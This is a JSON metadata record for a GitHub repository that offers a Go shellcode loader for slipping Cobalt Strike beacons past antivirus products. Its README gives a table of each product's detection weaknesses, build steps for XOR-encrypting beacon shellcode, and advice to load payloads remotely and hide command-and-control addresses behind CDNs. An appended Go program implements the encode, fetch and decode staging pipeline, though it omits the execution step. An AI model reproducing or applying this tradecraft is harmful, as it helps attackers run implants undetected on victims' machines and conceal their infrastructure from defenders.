{"id":13575229,"url":"https://github.com/Pizz33/GobypassAV-shellcode","last_synced_at":"2025-04-04T19:31:25.995Z","repository":{"id":156323913,"uuid":"629380527","full_name":"Pizz33/GobypassAV-shellcode","owner":"Pizz33","description":"Shellcode AV-evasion loader written in Go; bypasses Huorong, 360, 360 Core Crystal, Defender and other mainstream AV products","archived":false,"fork":false,"pushed_at":"2023-08-03T04:37:38.000Z","size":85,"stargazers_count":837,"open_issues_count":1,"forks_count":95,"subscribers_count":10,"default_branch":"main","last_synced_at":"2025-04-04T09:06:58.158Z","etag":null,"topics":["bypass","cobaltstrike","redteam","shellcode","shellcode-loader"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Pizz33.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2023-04-18T07:42:36.000Z","updated_at":"2025-04-02T04:13:29.000Z","dependencies_parsed_at":"2024-01-16T20:27:40.594Z","dependency_job_id":"83257c23-ac18-4979-a759-712e435ef902","html_url":"https://github.com/Pizz33/GobypassAV-shellcode","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Pizz33%2FGobypassAV-shellcode","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Pizz33%2FGobypassAV-shellcode/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Pizz33%2FGobypassAV-shellcode/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Pizz33%2FGobypassAV-shellcode/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/own
ers/Pizz33","download_url":"https://codeload.github.com/Pizz33/GobypassAV-shellcode/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247237678,"owners_count":20906329,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass","cobaltstrike","redteam","shellcode","shellcode-loader"],"created_at":"2024-08-01T15:00:59.208Z","updated_at":"2025-04-04T19:31:25.959Z","avatar_url":"https://github.com/Pizz33.png","language":"Go","funding_links":[],"categories":["Go","Red Team \u0026 Penetration Testing"],"sub_categories":[],"readme":"# GobypassAV-shellcode\n\nCobalt Strike AV evasion. Tested to bypass Huorong (火绒), 360, 360 Core Crystal (360核晶), 360 Antivirus, Defender, Kingsoft Antivirus (金山毒霸) and other mainstream AV products.\n\nShellcode embedded in the file is easy to extract and signature. Loading the beacon remotely gives better evasion and persistence, but the requested address is easy to block and trace back. Choose according to the situation in a real engagement, and hide the C2 address behind a cloud function or a CDN.\n\n| AV product | Evasion notes |\n| ---- | ---- |\n| Huorong | Many restrictions on compiler flags; detects on hash and string signatures; once the static scan passes, dynamic detection basically does not catch it; flags many Go library calls as malicious |\n| 360 | 360 Security Guard alone has weak detection, but once 360 Antivirus is installed the son becomes the father and detection improves greatly; it recognizes simple encryption well, and a beacon tends to check in and then drop offline a moment later because of cloud scanning; the separated (remote) loading method is recommended, together with anti-sandbox code to prolong the implant's lifetime |\n| 360 Core Crystal | Enabling it has little effect on overall detection; avoid loading shellcode through process injection; most cmd commands and related programs cannot run (use BOF plugins instead) |\n| Defender | Many new Cobalt Strike rules have been added; `Stageless` is recommended, its evasion is better than `Stage`; on version 4.5 enable the `sleep_mask` option to strengthen evasion; detection of large files is weak |\n\n\nFor a detailed tutorial see the blog: https://pizz33.github.io/posts/4ac17cb886a9/\n\nUsage:\n\n1. Generate the C payload\n\n![image](https://user-images.githubusercontent.com/88339946/232708666-a8e28b1b-2502-4bbc-91a9-d88e5ff44e9d.png)\n\n2. `go run encode.go` or `python xor64.py` to encrypt the shellcode\n\n![image](https://user-images.githubusercontent.com/88339946/232708833-9709b6c6-59b3-455a-aaa5-e4a92e549c3b.png)\n\n3. Paste the encrypted result into the code, then compile and run with `go build decode.go`\n\nFor remote loading, host the encrypted string in the cloud and put the cloud address into the corresponding position before building (it can be placed on a VPS or on OSS cloud storage, etc.)\n\n(Most errors here are missing dependencies; run `go mod init` \u0026 `go mod tidy` to fetch them)\n\nEvasion results:\n\n![image](https://user-images.githubusercontent.com/88339946/234937098-ba1f7e9b-0c8e-4455-a84b-46a6ae53159f.png)\n\n![image](https://user-images.githubusercontent.com/88339946/234936629-b80e9b97-8a85-485e-9097-bbf4091a4d39.png)\n\n![image](https://user-images.githubusercontent.com/88339946/234928250-bcf2952f-c345-4241-b33c-73e053b54dd5.png)\n\n![image](https://user-images.githubusercontent.com/88339946/233016193-23d034da-951a-400a-9720-fffa2b21ba81.png)\n\n![image](https://user-images.githubusercontent.com/88339946/234165227-7a26383c-6f8f-484a-8bfb-6d35d2880e59.png)\n\n![image](https://user-images.githubusercontent.com/88339946/234788023-2a9fd53a-2c02-4467-9ef1-6c654106680d.png)\n\n\n[![Star History Chart](https://api.star-history.com/svg?repos=Pizz33/GobypassAV-shellcode\u0026type=Date)](https://star-history.com/#star-history/star-history\u0026Date)\n\nThis project is for study and research only. Do not use it for any illegal or unauthorized activity; if personal use violates security-related laws, the consequences are not the author's responsibility.\n\nStanding on the shoulders of giants: the following projects by other researchers were referenced and borrowed from, with special thanks.\n\nhttps://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc\n\nhttps://github.com/7BitsTeam/EDR-Bypass-demo\n\nhttps://www.yuque.com/aufeng/aufeng_good/aq09p0#yNorm\n\nhttps://mp.weixin.qq.com/s/xiFbSE6goKFqLAlyACi83A\n\nhttps://github.com/timwhitez/Doge-Loader\n\nhttps://github.com/TideSec/GoBypassAV\n\nhttps://www.crisprx.top/archives/515\n\nhttps://github.com/Ne0nd0g/go-shellcode\n\nhttps://github.com/piiperxyz/AniYa\n\nhttps://github.com/safe6Sec/GolangBypassAV\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FPizz33%2FGobypassAV-shellcode","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FPizz33%2FGobypassAV-shellcode","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FPizz33%2FGobypassAV-shellcode/lists"}
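The encode, host, fetch and decode pipeline that the README's steps 2 and 3 and its remote-loading note describe, as an added example that is not the project's own encode.go, xor64.py or decode.go: it keeps the XOR-then-base64 scheme the README names, stands in for the VPS or OSS host with a local httptest server so it runs offline on any platform, and stops at the point where a Windows loader would hand the bytes to VirtualAlloc and CreateThread. The key, the sample payload bytes, the function names and the local server are all assumptions of this example, not the project's values.

```go
package main

import (
	"bytes"
	"encoding/base64"
	"errors"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
)

// sampleShellcode is a constructed stand-in for a Cobalt Strike "C" payload
// export (the opening bytes of a typical x64 stub); it is not a real Beacon.
var sampleShellcode = []byte{
	0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00,
	0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
}

// xorBytes XORs buf against a repeating key. XOR is its own inverse, so the
// same call both encrypts and decrypts.
func xorBytes(buf, key []byte) []byte {
	out := make([]byte, len(buf))
	for i, b := range buf {
		out[i] = b ^ key[i%len(key)]
	}
	return out
}

// EncodeShellcode is the encode.go / xor64.py step: XOR the raw shellcode with
// key, then base64 it so it can be pasted into the loader source or hosted
// as a text blob on a VPS or object storage.
func EncodeShellcode(raw, key []byte) (string, error) {
	if len(key) == 0 {
		return "", errors.New("xor key must not be empty")
	}
	return base64.StdEncoding.EncodeToString(xorBytes(raw, key)), nil
}

// DecodeShellcode is the decode.go step: base64-decode, then XOR with the
// same key to recover the raw bytes. A corrupt blob is an error, not a crash.
func DecodeShellcode(enc string, key []byte) ([]byte, error) {
	if len(key) == 0 {
		return nil, errors.New("xor key must not be empty")
	}
	data, err := base64.StdEncoding.DecodeString(enc)
	if err != nil {
		return nil, fmt.Errorf("bad base64 blob: %w", err)
	}
	return xorBytes(data, key), nil
}

// BlobLeaksBytes reports whether needle appears verbatim in the transported
// (still XORed) blob, i.e. whether a plain string scan would find it.
func BlobLeaksBytes(enc string, needle []byte) bool {
	raw, err := base64.StdEncoding.DecodeString(enc)
	return err == nil && bytes.Contains(raw, needle)
}

// FetchEncoded is the separated / remote loading step: download the encoded
// blob from url. The size cap stops a hostile or broken host from making the
// loader allocate without bound.
func FetchEncoded(url string) (string, error) {
	resp, err := http.Get(url)
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()
	if resp.StatusCode != http.StatusOK {
		return "", fmt.Errorf("unexpected status %d", resp.StatusCode)
	}
	body, err := io.ReadAll(io.LimitReader(resp.Body, 4<<20))
	if err != nil {
		return "", err
	}
	return string(body), nil
}

// LoadRemote chains fetch and decode. This is where a Windows loader would
// call VirtualAlloc / CreateThread; that part is deliberately left out.
func LoadRemote(url string, key []byte) ([]byte, error) {
	enc, err := FetchEncoded(url)
	if err != nil {
		return nil, err
	}
	return DecodeShellcode(enc, key)
}

// ServeBlob stands in for the VPS/OSS host: a local HTTP server that returns
// the encoded string for any path. The caller must Close() it.
func ServeBlob(enc string) *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		io.WriteString(w, enc)
	}))
}

func main() {
	key := []byte("example-key") // constructed; use a fresh random key per build
	enc, err := EncodeShellcode(sampleShellcode, key)
	if err != nil {
		panic(err)
	}
	srv := ServeBlob(enc)
	defer srv.Close()
	got, err := LoadRemote(srv.URL+"/b64.txt", key)
	if err != nil {
		panic(err)
	}
	fmt.Println("round trip ok:", bytes.Equal(got, sampleShellcode))
	fmt.Println("stub visible in blob:", BlobLeaksBytes(enc, sampleShellcode[:4]))
}
```

A repeating short XOR key only removes the literal byte pattern from the file; a scanner that brute-forces single-byte keys or XORs the blob against known Beacon prefixes recovers it, which is the point the table makes about 360 seeing through simple encryption. The remote variant moves the payload out of the binary but, as the README also notes, only helps while the hosting address stays unblocked.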